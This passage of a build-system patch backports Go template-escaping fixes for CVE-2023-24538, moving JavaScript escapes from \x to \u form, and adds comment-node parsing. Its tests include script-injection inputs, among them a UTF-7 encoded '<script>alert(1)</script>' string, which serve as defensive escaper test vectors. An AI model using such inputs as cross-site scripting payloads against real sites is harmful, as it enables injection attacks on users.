+ `"greeting=H%69,\u0026addressee=(World)"`,
+ `"greeting=H%69,\u0026addressee=(World) 2x, https://golang.org/favicon.ico 500.5w"`,
+ `",foo/,"`,
+@@ -162,7 +162,7 @@ func TestTypedContent(t *testing.T) {
+ // Not JS escaped but HTML escaped.
+ `c &amp;&amp; alert(&#34;Hello, World!&#34;);`,
+ // Escape sequence not over-escaped.
+- `&#34;Hello, World &amp; O&#39;Reilly\x21&#34;`,
++ `&#34;Hello, World &amp; O&#39;Reilly\u0021&#34;`,
+ `&#34;greeting=H%69,\u0026addressee=(World)&#34;`,
+ `&#34;greeting=H%69,\u0026addressee=(World) 2x, https://golang.org/favicon.ico 500.5w&#34;`,
+ `&#34;,foo/,&#34;`,
+@@ -171,30 +171,30 @@ func TestTypedContent(t *testing.T) {
+ {
+ `<script>alert("{{.}}")</script>`,
+ []string{
+- `\x3cb\x3e \x22foo%\x22 O\x27Reilly \x26bar;`,
+- `a[href =~ \x22\/\/example.com\x22]#foo`,
+- `Hello, \x3cb\x3eWorld\x3c\/b\x3e \x26amp;tc!`,
+- ` dir=\x22ltr\x22`,
+- `c \x26\x26 alert(\x22Hello, World!\x22);`,
++ `\u003cb\u003e \u0022foo%\u0022 O\u0027Reilly \u0026bar;`,
++ `a[href =~ \u0022\/\/example.com\u0022]#foo`,
++ `Hello, \u003cb\u003eWorld\u003c\/b\u003e \u0026amp;tc!`,
++ ` dir=\u0022ltr\u0022`,
++ `c \u0026\u0026 alert(\u0022Hello, World!\u0022);`,
+ // Escape sequence not over-escaped.
+- `Hello, World \x26 O\x27Reilly\x21`,
+- `greeting=H%69,\x26addressee=(World)`,
+- `greeting=H%69,\x26addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
++ `Hello, World \u0026 O\u0027Reilly\u0021`,
++ `greeting=H%69,\u0026addressee=(World)`,
++ `greeting=H%69,\u0026addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
+ `,foo\/,`,
+ },
+ },
+ {
+ `<script type="text/javascript">alert("{{.}}")</script>`,
+ []string{
+- `\x3cb\x3e \x22foo%\x22 O\x27Reilly \x26bar;`,
+- `a[href =~ \x22\/\/example.com\x22]#foo`,
+- `Hello, \x3cb\x3eWorld\x3c\/b\x3e \x26amp;tc!`,
+- ` dir=\x22ltr\x22`,
+- `c \x26\x26 alert(\x22Hello, World!\x22);`,
++ `\u003cb\u003e \u0022foo%\u0022 O\u0027Reilly \u0026bar;`,
++ `a[href =~ \u0022\/\/example.com\u0022]#foo`,
++ `Hello, \u003cb\u003eWorld\u003c\/b\u003e \u0026amp;tc!`,
++ ` dir=\u0022ltr\u0022`,
++ `c \u0026\u0026 alert(\u0022Hello, World!\u0022);`,
+ // Escape sequence not over-escaped.
+- `Hello, World \x26 O\x27Reilly\x21`,
+- `greeting=H%69,\x26addressee=(World)`,
+- `greeting=H%69,\x26addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
++ `Hello, World \u0026 O\u0027Reilly\u0021`,
++ `greeting=H%69,\u0026addressee=(World)`,
++ `greeting=H%69,\u0026addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
+ `,foo\/,`,
+ },
+ },
+@@ -208,7 +208,7 @@ func TestTypedContent(t *testing.T) {
+ // Not escaped.
+ `c && alert("Hello, World!");`,
+ // Escape sequence not over-escaped.
+- `"Hello, World & O'Reilly\x21"`,
++ `"Hello, World & O'Reilly\u0021"`,
+ `"greeting=H%69,\u0026addressee=(World)"`,
+ `"greeting=H%69,\u0026addressee=(World) 2x, https://golang.org/favicon.ico 500.5w"`,
+ `",foo/,"`,
+@@ -224,7 +224,7 @@ func TestTypedContent(t *testing.T) {
+ `Hello, <b>World</b> &amp;tc!`,
+ ` dir=&#34;ltr&#34;`,
+ `c &amp;&amp; alert(&#34;Hello, World!&#34;);`,
+- `Hello, World &amp; O&#39;Reilly\x21`,
++ `Hello, World &amp; O&#39;Reilly\u0021`,
+ `greeting=H%69,&amp;addressee=(World)`,
+ `greeting=H%69,&amp;addressee=(World) 2x, https://golang.org/favicon.ico 500.5w`,
+ `,foo/,`,
+@@ -233,15 +233,15 @@ func TestTypedContent(t *testing.T) {
+ {
+ `<button onclick='alert("{{.}}")'>`,
+ []string{
+- `\x3cb\x3e \x22foo%\x22 O\x27Reilly \x26bar;`,
+- `a[href =~ \x22\/\/example.com\x22]#foo`,
+- `Hello, \x3cb\x3eWorld\x3c\/b\x3e \x26amp;tc!`,
+- ` dir=\x22ltr\x22`,
+- `c \x26\x26 alert(\x22Hello, World!\x22);`,
++ `\u003cb\u003e \u0022foo%\u0022 O\u0027Reilly \u0026bar;`,
++ `a[href =~ \u0022\/\/example.com\u0022]#foo`,
++ `Hello, \u003cb\u003eWorld\u003c\/b\u003e \u0026amp;tc!`,
++ ` dir=\u0022ltr\u0022`,
++ `c \u0026\u0026 alert(\u0022Hello, World!\u0022);`,
+ // Escape sequence not over-escaped.
+- `Hello, World \x26 O\x27Reilly\x21`,
+- `greeting=H%69,\x26addressee=(World)`,
+- `greeting=H%69,\x26addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
++ `Hello, World \u0026 O\u0027Reilly\u0021`,
++ `greeting=H%69,\u0026addressee=(World)`,
++ `greeting=H%69,\u0026addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
+ `,foo\/,`,
+ },
+ },
+@@ -253,7 +253,7 @@ func TestTypedContent(t *testing.T) {
+ `Hello%2c%20%3cb%3eWorld%3c%2fb%3e%20%26amp%3btc%21`,
+ `%20dir%3d%22ltr%22`,
+ `c%20%26%26%20alert%28%22Hello%2c%20World%21%22%29%3b`,
+- `Hello%2c%20World%20%26%20O%27Reilly%5cx21`,
++ `Hello%2c%20World%20%26%20O%27Reilly%5cu0021`,
+ // Quotes and parens are escaped but %69 is not over-escaped. HTML escaping is done.
+ `greeting=H%69,&amp;addressee=%28World%29`,
+ `greeting%3dH%2569%2c%26addressee%3d%28World%29%202x%2c%20https%3a%2f%2fgolang.org%2ffavicon.ico%20500.5w`,
+@@ -268,7 +268,7 @@ func TestTypedContent(t *testing.T) {
+ `Hello%2c%20%3cb%3eWorld%3c%2fb%3e%20%26amp%3btc%21`,
+ `%20dir%3d%22ltr%22`,
+ `c%20%26%26%20alert%28%22Hello%2c%20World%21%22%29%3b`,
+- `Hello%2c%20World%20%26%20O%27Reilly%5cx21`,
++ `Hello%2c%20World%20%26%20O%27Reilly%5cu0021`,
+ // Quotes and parens are escaped but %69 is not over-escaped. HTML escaping is not done.
+ `greeting=H%69,&addressee=%28World%29`,
+ `greeting%3dH%2569%2c%26addressee%3d%28World%29%202x%2c%20https%3a%2f%2fgolang.org%2ffavicon.ico%20500.5w`,
+diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
+index e72a9ba..c709660 100644
+--- a/src/html/template/escape_test.go
++++ b/src/html/template/escape_test.go
+@@ -238,7 +238,7 @@ func TestEscape(t *testing.T) {
+ {
+ "jsStr",
+ "<button onclick='alert(&quot;{{.H}}&quot;)'>",
+- `<button onclick='alert(&quot;\x3cHello\x3e&quot;)'>`,
++ `<button onclick='alert(&quot;\u003cHello\u003e&quot;)'>`,
+ },
+ {
+ "badMarshaler",
+@@ -259,7 +259,7 @@ func TestEscape(t *testing.T) {
+ {
+ "jsRe",
+ `<button onclick='alert(/{{"foo+bar"}}/.test(""))'>`,
+- `<button onclick='alert(/foo\x2bbar/.test(""))'>`,
++ `<button onclick='alert(/foo\u002bbar/.test(""))'>`,
+ },
+ {
+ "jsReBlank",
+@@ -825,7 +825,7 @@ func TestEscapeSet(t *testing.T) {
+ "main": `<button onclick="title='{{template "helper"}}'; ...">{{template "helper"}}</button>`,
+ "helper": `{{11}} of {{"<100>"}}`,
+ },
+- `<button onclick="title='11 of \x3c100\x3e'; ...">11 of &lt;100&gt;</button>`,
++ `<button onclick="title='11 of \u003c100\u003e'; ...">11 of &lt;100&gt;</button>`,
+ },
+ // A non-recursive template that ends in a different context.
+ // helper starts in jsCtxRegexp and ends in jsCtxDivOp.
+diff --git a/src/html/template/example_test.go b/src/html/template/example_test.go
+index 9d965f1..6cf936f 100644
+--- a/src/html/template/example_test.go
++++ b/src/html/template/example_test.go
+@@ -116,9 +116,9 @@ func Example_escape() {
+ // &#34;Fran &amp; Freddie&#39;s Diner&#34; &lt;tasty@example.com&gt;
+ // &#34;Fran &amp; Freddie&#39;s Diner&#34; &lt;tasty@example.com&gt;
+ // &#34;Fran &amp; Freddie&#39;s Diner&#34;32&lt;tasty@example.com&gt;
+- // \"Fran \x26 Freddie\'s Diner\" \x3Ctasty@example.com\x3E
+- // \"Fran \x26 Freddie\'s Diner\" \x3Ctasty@example.com\x3E
+- // \"Fran \x26 Freddie\'s Diner\"32\x3Ctasty@example.com\x3E
++ // \"Fran \u0026 Freddie\'s Diner\" \u003Ctasty@example.com\u003E
++ // \"Fran \u0026 Freddie\'s Diner\" \u003Ctasty@example.com\u003E
++ // \"Fran \u0026 Freddie\'s Diner\"32\u003Ctasty@example.com\u003E
+ // %22Fran+%26+Freddie%27s+Diner%2232%3Ctasty%40example.com%3E
+
+ }
+diff --git a/src/html/template/js.go b/src/html/template/js.go
+index 0e91458..ea9c183 100644
+--- a/src/html/template/js.go
++++ b/src/html/template/js.go
+@@ -163,7 +163,6 @@ func jsValEscaper(args ...interface{}) string {
+ }
+ // TODO: detect cycles before calling Marshal which loops infinitely on
+ // cyclic data. This may be an unacceptable DoS risk.
+-
+ b, err := json.Marshal(a)
+ if err != nil {
+ // Put a space before comment so that if it is flush against
+@@ -178,8 +177,8 @@ func jsValEscaper(args ...interface{}) string {
+ // TODO: maybe post-process output to prevent it from containing
+ // "<!--", "-->", "<![CDATA[", "]]>", or "</script"
+ // in case custom marshalers produce output containing those.
+-
+- // TODO: Maybe abbreviate \u00ab to \xab to produce more compact output.
++ // Note: Do not use \x escaping to save bytes because it is not JSON compatible and this escaper
++ // supports ld+json content-type.
+ if len(b) == 0 {
+ // In, `x=y/{{.}}*z` a json.Marshaler that produces "" should
+ // not cause the output `x=y/*z`.
+@@ -260,6 +259,8 @@ func replace(s string, replacementTable []string) string {
+ r, w = utf8.DecodeRuneInString(s[i:])
+ var repl string
+ switch {
++ case int(r) < len(lowUnicodeReplacementTable):
++ repl = lowUnicodeReplacementTable[r]
+ case int(r) < len(replacementTable) && replacementTable[r] != "":
+ repl = replacementTable[r]
+ case r == '\u2028':
+@@ -283,67 +284,80 @@ func replace(s string, replacementTable []string) string {
+ return b.String()
+ }
+
++var lowUnicodeReplacementTable = []string{
++ 0: `\u0000`, 1: `\u0001`, 2: `\u0002`, 3: `\u0003`, 4: `\u0004`, 5: `\u0005`, 6: `\u0006`,
++ '\a': `\u0007`,
++ '\b': `\u0008`,
++ '\t': `\t`,
++ '\n': `\n`,
++ '\v': `\u000b`, // "\v" == "v" on IE 6.
++ '\f': `\f`,
++ '\r': `\r`,
++ 0xe: `\u000e`, 0xf: `\u000f`, 0x10: `\u0010`, 0x11: `\u0011`, 0x12: `\u0012`, 0x13: `\u0013`,
++ 0x14: `\u0014`, 0x15: `\u0015`, 0x16: `\u0016`, 0x17: `\u0017`, 0x18: `\u0018`, 0x19: `\u0019`,
++ 0x1a: `\u001a`, 0x1b: `\u001b`, 0x1c: `\u001c`, 0x1d: `\u001d`, 0x1e: `\u001e`, 0x1f: `\u001f`,
++}
++
+ var jsStrReplacementTable = []string{
+- 0: `\0`,
++ 0: `\u0000`,
+ '\t': `\t`,
+ '\n': `\n`,
+- '\v': `\x0b`, // "\v" == "v" on IE 6.
++ '\v': `\u000b`, // "\v" == "v" on IE 6.
+ '\f': `\f`,
+ '\r': `\r`,
+ // Encode HTML specials as hex so the output can be embedded
+ // in HTML attributes without further encoding.
+- '"': `\x22`,
+- '&': `\x26`,
+- '\'': `\x27`,
+- '+': `\x2b`,
++ '"': `\u0022`,
++ '&': `\u0026`,
++ '\'': `\u0027`,
++ '+': `\u002b`,
+ '/': `\/`,
+- '<': `\x3c`,
+- '>': `\x3e`,
++ '<': `\u003c`,
++ '>': `\u003e`,
+ '\\': `\\`,
+ }
+
+ // jsStrNormReplacementTable is like jsStrReplacementTable but does not
+ // overencode existing escapes since this table has no entry for `\`.
+ var jsStrNormReplacementTable = []string{
+- 0: `\0`,
++ 0: `\u0000`,
+ '\t': `\t`,
+ '\n': `\n`,
+- '\v': `\x0b`, // "\v" == "v" on IE 6.
++ '\v': `\u000b`, // "\v" == "v" on IE 6.
+ '\f': `\f`,
+ '\r': `\r`,
+ // Encode HTML specials as hex so the output can be embedded
+ // in HTML attributes without further encoding.
+- '"': `\x22`,
+- '&': `\x26`,
+- '\'': `\x27`,
+- '+': `\x2b`,
++ '"': `\u0022`,
++ '&': `\u0026`,
++ '\'': `\u0027`,
++ '+': `\u002b`,
+ '/': `\/`,
+- '<': `\x3c`,
+- '>': `\x3e`,
++ '<': `\u003c`,
++ '>': `\u003e`,
+ }
+-
+ var jsRegexpReplacementTable = []string{
+- 0: `\0`,
++ 0: `\u0000`,
+ '\t': `\t`,
+ '\n': `\n`,
+- '\v': `\x0b`, // "\v" == "v" on IE 6.
++ '\v': `\u000b`, // "\v" == "v" on IE 6.
+ '\f': `\f`,
+ '\r': `\r`,
+ // Encode HTML specials as hex so the output can be embedded
+ // in HTML attributes without further encoding.
+- '"': `\x22`,
++ '"': `\u0022`,
+ '$': `\$`,
+- '&': `\x26`,
+- '\'': `\x27`,
++ '&': `\u0026`,
++ '\'': `\u0027`,
+ '(': `\(`,
+ ')': `\)`,
+ '*': `\*`,
+- '+': `\x2b`,
++ '+': `\u002b`,
+ '-': `\-`,
+ '.': `\.`,
+ '/': `\/`,
+- '<': `\x3c`,
+- '>': `\x3e`,
++ '<': `\u003c`,
++ '>': `\u003e`,
+ '?': `\?`,
+ '[': `\[`,
+ '\\': `\\`,
+diff --git a/src/html/template/js_test.go b/src/html/template/js_test.go
+index 075adaa..d7ee47b 100644
+--- a/src/html/template/js_test.go
++++ b/src/html/template/js_test.go
+@@ -137,7 +137,7 @@ func TestJSValEscaper(t *testing.T) {
+ {"foo", `"foo"`},
+ // Newlines.
+ {"\r\n\u2028\u2029", `"\r\n\u2028\u2029"`},
+- // "\v" == "v" on IE 6 so use "\x0b" instead.
++ // "\v" == "v" on IE 6 so use "\u000b" instead.
+ {"\t\x0b", `"\t\u000b"`},
+ {struct{ X, Y int }{1, 2}, `{"X":1,"Y":2}`},
+ {[]interface{}{}, "[]"},
+@@ -173,7 +173,7 @@ func TestJSStrEscaper(t *testing.T) {
+ }{
+ {"", ``},
+ {"foo", `foo`},
+- {"\u0000", `\0`},
++ {"\u0000", `\u0000`},
+ {"\t", `\t`},
+ {"\n", `\n`},
+ {"\r", `\r`},
+@@ -183,14 +183,14 @@ func TestJSStrEscaper(t *testing.T) {
+ {"\\n", `\\n`},
+ {"foo\r\nbar", `foo\r\nbar`},
+ // Preserve attribute boundaries.
+- {`"`, `\x22`},
+- {`'`, `\x27`},
++ {`"`, `\u0022`},
++ {`'`, `\u0027`},
+ // Allow embedding in HTML without further escaping.
+- {`&amp;`, `\x26amp;`},
++ {`&amp;`, `\u0026amp;`},
+ // Prevent breaking out of text node and element boundaries.
+- {"</script>", `\x3c\/script\x3e`},
+- {"<![CDATA[", `\x3c![CDATA[`},
+- {"]]>", `]]\x3e`},
++ {"</script>", `\u003c\/script\u003e`},
++ {"<![CDATA[", `\u003c![CDATA[`},
++ {"]]>", `]]\u003e`},
+ // https://dev.w3.org/html5/markup/aria/syntax.html#escaping-text-span
+ // "The text in style, script, title, and textarea elements
+ // must not have an escaping text span start that is not
+@@ -201,11 +201,11 @@ func TestJSStrEscaper(t *testing.T) {
+ // allow regular text content to be interpreted as script
+ // allowing script execution via a combination of a JS string
+ // injection followed by an HTML text injection.
+- {"<!--", `\x3c!--`},
+- {"-->", `--\x3e`},
++ {"<!--", `\u003c!--`},
++ {"-->", `--\u003e`},
+ // From https://code.google.com/p/doctype/wiki/ArticleUtf7
+ {"+ADw-script+AD4-alert(1)+ADw-/script+AD4-",
+- `\x2bADw-script\x2bAD4-alert(1)\x2bADw-\/script\x2bAD4-`,
++ `\u002bADw-script\u002bAD4-alert(1)\u002bADw-\/script\u002bAD4-`,
+ },
+ // Invalid UTF-8 sequence
+ {"foo\xA0bar", "foo\xA0bar"},
+@@ -228,7 +228,7 @@ func TestJSRegexpEscaper(t *testing.T) {
+ }{
+ {"", `(?:)`},
+ {"foo", `foo`},
+- {"\u0000", `\0`},
++ {"\u0000", `\u0000`},
+ {"\t", `\t`},
+ {"\n", `\n`},
+ {"\r", `\r`},
+@@ -238,19 +238,19 @@ func TestJSRegexpEscaper(t *testing.T) {
+ {"\\n", `\\n`},
+ {"foo\r\nbar", `foo\r\nbar`},
+ // Preserve attribute boundaries.
+- {`"`, `\x22`},
+- {`'`, `\x27`},
++ {`"`, `\u0022`},
++ {`'`, `\u0027`},
+ // Allow embedding in HTML without further escaping.
+- {`&amp;`, `\x26amp;`},
++ {`&amp;`, `\u0026amp;`},
+ // Prevent breaking out of text node and element boundaries.
+- {"</script>", `\x3c\/script\x3e`},
+- {"<![CDATA[", `\x3c!\[CDATA\[`},
+- {"]]>", `\]\]\x3e`},
++ {"</script>", `\u003c\/script\u003e`},
++ {"<![CDATA[", `\u003c!\[CDATA\[`},
++ {"]]>", `\]\]\u003e`},
+ // Escaping text spans.
+- {"<!--", `\x3c!\-\-`},
+- {"-->", `\-\-\x3e`},
++ {"<!--", `\u003c!\-\-`},
++ {"-->", `\-\-\u003e`},
+ {"*", `\*`},
+- {"+", `\x2b`},
++ {"+", `\u002b`},
+ {"?", `\?`},
+ {"[](){}", `\[\]\(\)\{\}`},
+ {"$foo|x.y", `\$foo\|x\.y`},
+@@ -284,27 +284,27 @@ func TestEscapersOnLower7AndSelectHighCodepoints(t *testing.T) {
+ {
+ "jsStrEscaper",
+ jsStrEscaper,
+- "\\0\x01\x02\x03\x04\x05\x06\x07" +
+- "\x08\\t\\n\\x0b\\f\\r\x0E\x0F" +
+- "\x10\x11\x12\x13\x14\x15\x16\x17" +
+- "\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" +
+- ` !\x22#$%\x26\x27()*\x2b,-.\/` +
+- `0123456789:;\x3c=\x3e?` +
++ `\u0000\u0001\u0002\u0003\u0004\u0005\u0006\u0007` +
++ `\u0008\t\n\u000b\f\r\u000e\u000f` +
++ `\u0010\u0011\u0012\u0013\u0014\u0015\u0016\u0017` +
++ `\u0018\u0019\u001a\u001b\u001c\u001d\u001e\u001f` +
++ ` !\u0022#$%\u0026\u0027()*\u002b,-.\/` +
++ `0123456789:;\u003c=\u003e?` +
+ `@ABCDEFGHIJKLMNO` +
+ `PQRSTUVWXYZ[\\]^_` +
+ "`abcdefghijklmno" +
+- "pqrstuvwxyz{|}~\x7f" +
++ "pqrstuvwxyz{|}~\u007f" +
+ "\u00A0\u0100\\u2028\\u2029\ufeff\U0001D11E",
+ },
+ {
+ "jsRegexpEscaper",
+ jsRegexpEscaper,
+- "\\0\x01\x02\x03\x04\x05\x06\x07" +
+- "\x08\\t\\n\\x0b\\f\\r\x0E\x0F" +
+- "\x10\x11\x12\x13\x14\x15\x16\x17" +
+- "\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" +
+- ` !\x22#\$%\x26\x27\(\)\*\x2b,\-\.\/` +
+- `0123456789:;\x3c=\x3e\?` +
++ `\u0000\u0001\u0002\u0003\u0004\u0005\u0006\u0007` +
++ `\u0008\t\n\u000b\f\r\u000e\u000f` +
++ `\u0010\u0011\u0012\u0013\u0014\u0015\u0016\u0017` +
++ `\u0018\u0019\u001a\u001b\u001c\u001d\u001e\u001f` +
++ ` !\u0022#\$%\u0026\u0027\(\)\*\u002b,\-\.\/` +
++ `0123456789:;\u003c=\u003e\?` +
+ `@ABCDEFGHIJKLMNO` +
+ `PQRSTUVWXYZ\[\\\]\^_` +
+ "`abcdefghijklmno" +
+diff --git a/src/html/template/template_test.go b/src/html/template/template_test.go
+index 13e6ba4..86bd4db 100644
+--- a/src/html/template/template_test.go
++++ b/src/html/template/template_test.go
+@@ -6,6 +6,7 @@ package template_test
+
+ import (
+ "bytes"
++ "encoding/json"
+ . "html/template"
+ "strings"
+ "testing"
+@@ -121,6 +122,44 @@ func TestNumbers(t *testing.T) {
+ c.mustExecute(c.root, nil, "12.34 7.5")
+ }
+
++func TestStringsInScriptsWithJsonContentTypeAreCorrectlyEscaped(t *testing.T) {
++ // See #33671 and #37634 for more context on this.
++ tests := []struct{ name, in string }{
++ {"empty", ""},
++ {"invalid", string(rune(-1))},
++ {"null", "\u0000"},
++ {"unit separator", "\u001F"},
++ {"tab", "\t"},
++ {"gt and lt", "<>"},
++ {"quotes", `'"`},
++ {"ASCII letters", "ASCII letters"},
++ {"Unicode", "ʕ⊙ϖ⊙ʔ"},
++ {"Pizza", "P"},
++ }
++ const (
++ prefix = `<script type="application/ld+json">`
++ suffix = `</script>`
++ templ = prefix + `"{{.}}"` + suffix
++ )
++ tpl := Must(New("JS string is JSON string").Parse(templ))
++ for _, tt := range tests {
++ t.Run(tt.name, func(t *testing.T) {
++ var buf bytes.Buffer
++ if err := tpl.Execute(&buf, tt.in); err != nil {
++ t.Fatalf("Cannot render template: %v", err)
++ }
++ trimmed := bytes.TrimSuffix(bytes.TrimPrefix(buf.Bytes(), []byte(prefix)), []byte(suffix))
++ var got string
++ if err := json.Unmarshal(trimmed, &got); err != nil {
++ t.Fatalf("Cannot parse JS string %q as JSON: %v", trimmed[1:len(trimmed)-1], err)
++ }
++ if got != tt.in {
++ t.Errorf("Serialization changed the string value: got %q want %q", got, tt.in)
++ }
++ })
++ }
++}
++
+ type testCase struct {
+ t *testing.T
+ root *Template
+diff --git a/src/text/template/exec_test.go b/src/text/template/exec_test.go
+index 77294ed..b8a809e 100644
+--- a/src/text/template/exec_test.go
++++ b/src/text/template/exec_test.go
+@@ -911,9 +911,9 @@ func TestJSEscaping(t *testing.T) {
+ {`Go "jump" \`, `Go \"jump\" \\`},
+ {`Yukihiro says "今日は世界"`, `Yukihiro says \"今日は世界\"`},
+ {"unprintable \uFDFF", `unprintable \uFDFF`},
+- {`<html>`, `\x3Chtml\x3E`},
+- {`no = in attributes`, `no \x3D in attributes`},
+- {`&#x27; does not become HTML entity`, `\x26#x27; does not become HTML entity`},
++ {`<html>`, `\u003Chtml\u003E`},
++ {`no = in attributes`, `no \u003D in attributes`},
++ {`&#x27; does not become HTML entity`, `\u0026#x27; does not become HTML entity`},
+ }
+ for _, tc := range testCases {
+ s := JSEscapeString(tc.in)
+diff --git a/src/text/template/funcs.go b/src/text/template/funcs.go
+index 46125bc..f3de9fb 100644
+--- a/src/text/template/funcs.go
++++ b/src/text/template/funcs.go
+@@ -640,10 +640,10 @@ var (
+ jsBackslash = []byte(`\\`)
+ jsApos = []byte(`\'`)
+ jsQuot = []byte(`\"`)
+- jsLt = []byte(`\x3C`)
+- jsGt = []byte(`\x3E`)
+- jsAmp = []byte(`\x26`)
+- jsEq = []byte(`\x3D`)
++ jsLt = []byte(`\u003C`)
++ jsGt = []byte(`\u003E`)
++ jsAmp = []byte(`\u0026`)
++ jsEq = []byte(`\u003D`)
+ )
+
+ // JSEscape writes to w the escaped JavaScript equivalent of the plain text data b.
+--
+2.7.4
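To illustrate the effect of this escaping change (not part of the patch; the template text and data value are invented for the example), a value interpolated inside a JSON-flavoured script element now comes out with \u escapes, so the emitted script body stays parseable as JSON:

    // Illustrative sketch only; assumes a toolchain with the change above.
    package main

    import (
        "html/template"
        "os"
    )

    func main() {
        t := template.Must(template.New("ld").Parse(
            `<script type="application/ld+json">{"name": "{{.}}"}</script>`))
        // With this change, specials such as ', &, < and > are emitted as
        // \u0027, \u0026, \u003c and \u003e rather than \x27, \x26, \x3c, \x3e,
        // so the script body remains valid JSON.
        if err := t.Execute(os.Stdout, `O'Reilly & <Friends>`); err != nil {
            panic(err)
        }
    }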
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_3.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_3.patch
new file mode 100644
index 0000000000..cd7dd0957c
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_3.patch
@@ -0,0 +1,393 @@
+From 7ddce23c7d5b728acf8482f5006497c7b9915f8a Mon Sep 17 00:00:00 2001
+From: Ariel Mashraki <ariel@mashraki.co.il>
+Date: Wed, 22 Apr 2020 22:17:56 +0300
+Subject: [PATCH 3/6] text/template: add CommentNode to template parse tree
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Fixes #34652
+
+Change-Id: Icf6e3eda593fed826736f34f95a9d66f5450cc98
+Reviewed-on: https://go-review.googlesource.com/c/go/+/229398
+Reviewed-by: Daniel Martí <mvdan@mvdan.cc>
+Run-TryBot: Daniel Martí <mvdan@mvdan.cc>
+TryBot-Result: Gobot Gobot <gobot@golang.org>
+
+Dependency Patch #3
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/c8ea03828b0645b1fd5725888e44873b75fcfbb6
+CVE: CVE-2023-24538
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ api/next.txt | 19 +++++++++++++++++++
+ src/html/template/escape.go | 2 ++
+ src/html/template/template_test.go | 16 ++++++++++++++++
+ src/text/template/exec.go | 1 +
+ src/text/template/parse/lex.go | 8 +++++++-
+ src/text/template/parse/lex_test.go | 7 +++++--
+ src/text/template/parse/node.go | 33 +++++++++++++++++++++++++++++++++
+ src/text/template/parse/parse.go | 22 +++++++++++++++++++---
+ src/text/template/parse/parse_test.go | 25 +++++++++++++++++++++++++
+ 9 files changed, 127 insertions(+), 6 deletions(-)
+
+diff --git a/api/next.txt b/api/next.txt
+index e69de29..076f39e 100644
+--- a/api/next.txt
++++ b/api/next.txt
+@@ -0,0 +1,19 @@
++pkg unicode, const Version = "13.0.0"
++pkg unicode, var Chorasmian *RangeTable
++pkg unicode, var Dives_Akuru *RangeTable
++pkg unicode, var Khitan_Small_Script *RangeTable
++pkg unicode, var Yezidi *RangeTable
++pkg text/template/parse, const NodeComment = 20
++pkg text/template/parse, const NodeComment NodeType
++pkg text/template/parse, const ParseComments = 1
++pkg text/template/parse, const ParseComments Mode
++pkg text/template/parse, method (*CommentNode) Copy() Node
++pkg text/template/parse, method (*CommentNode) String() string
++pkg text/template/parse, method (CommentNode) Position() Pos
++pkg text/template/parse, method (CommentNode) Type() NodeType
++pkg text/template/parse, type CommentNode struct
++pkg text/template/parse, type CommentNode struct, Text string
++pkg text/template/parse, type CommentNode struct, embedded NodeType
++pkg text/template/parse, type CommentNode struct, embedded Pos
++pkg text/template/parse, type Mode uint
++pkg text/template/parse, type Tree struct, Mode Mode
+diff --git a/src/html/template/escape.go b/src/html/template/escape.go
+index f12dafa..8739735 100644
+--- a/src/html/template/escape.go
++++ b/src/html/template/escape.go
+@@ -124,6 +124,8 @@ func (e *escaper) escape(c context, n parse.Node) context {
+ switch n := n.(type) {
+ case *parse.ActionNode:
+ return e.escapeAction(c, n)
++ case *parse.CommentNode:
++ return c
+ case *parse.IfNode:
+ return e.escapeBranch(c, &n.BranchNode, "if")
+ case *parse.ListNode:
+diff --git a/src/html/template/template_test.go b/src/html/template/template_test.go
+index 86bd4db..1f2c888 100644
+--- a/src/html/template/template_test.go
++++ b/src/html/template/template_test.go
+@@ -10,6 +10,7 @@ import (
+ . "html/template"
+ "strings"
+ "testing"
++ "text/template/parse"
+ )
+
+ func TestTemplateClone(t *testing.T) {
+@@ -160,6 +161,21 @@ func TestStringsInScriptsWithJsonContentTypeAreCorrectlyEscaped(t *testing.T) {
+ }
+ }
+
++func TestSkipEscapeComments(t *testing.T) {
++ c := newTestCase(t)
++ tr := parse.New("root")
++ tr.Mode = parse.ParseComments
++ newT, err := tr.Parse("{{/* A comment */}}{{ 1 }}{{/* Another comment */}}", "", "", make(map[string]*parse.Tree))
++ if err != nil {
++ t.Fatalf("Cannot parse template text: %v", err)
++ }
++ c.root, err = c.root.AddParseTree("root", newT)
++ if err != nil {
++ t.Fatalf("Cannot add parse tree to template: %v", err)
++ }
++ c.mustExecute(c.root, nil, "1")
++}
++
+ type testCase struct {
+ t *testing.T
+ root *Template
+diff --git a/src/text/template/exec.go b/src/text/template/exec.go
+index ac3e741..7ac5175 100644
+--- a/src/text/template/exec.go
++++ b/src/text/template/exec.go
+@@ -256,6 +256,7 @@ func (s *state) walk(dot reflect.Value, node parse.Node) {
+ if len(node.Pipe.Decl) == 0 {
+ s.printValue(node, val)
+ }
++ case *parse.CommentNode:
+ case *parse.IfNode:
+ s.walkIfOrWith(parse.NodeIf, dot, node.Pipe, node.List, node.ElseList)
+ case *parse.ListNode:
+diff --git a/src/text/template/parse/lex.go b/src/text/template/parse/lex.go
+index 30371f2..e41373a 100644
+--- a/src/text/template/parse/lex.go
++++ b/src/text/template/parse/lex.go
+@@ -41,6 +41,7 @@ const (
+ itemBool // boolean constant
+ itemChar // printable ASCII character; grab bag for comma etc.
+ itemCharConstant // character constant
++ itemComment // comment text
+ itemComplex // complex constant (1+2i); imaginary is just a number
+ itemAssign // equals ('=') introducing an assignment
+ itemDeclare // colon-equals (':=') introducing a declaration
+@@ -112,6 +113,7 @@ type lexer struct {
+ leftDelim string // start of action
+ rightDelim string // end of action
+ trimRightDelim string // end of action with trim marker
++ emitComment bool // emit itemComment tokens.
+ pos Pos // current position in the input
+ start Pos // start position of this item
+ width Pos // width of last rune read from input
+@@ -203,7 +205,7 @@ func (l *lexer) drain() {
+ }
+
+ // lex creates a new scanner for the input string.
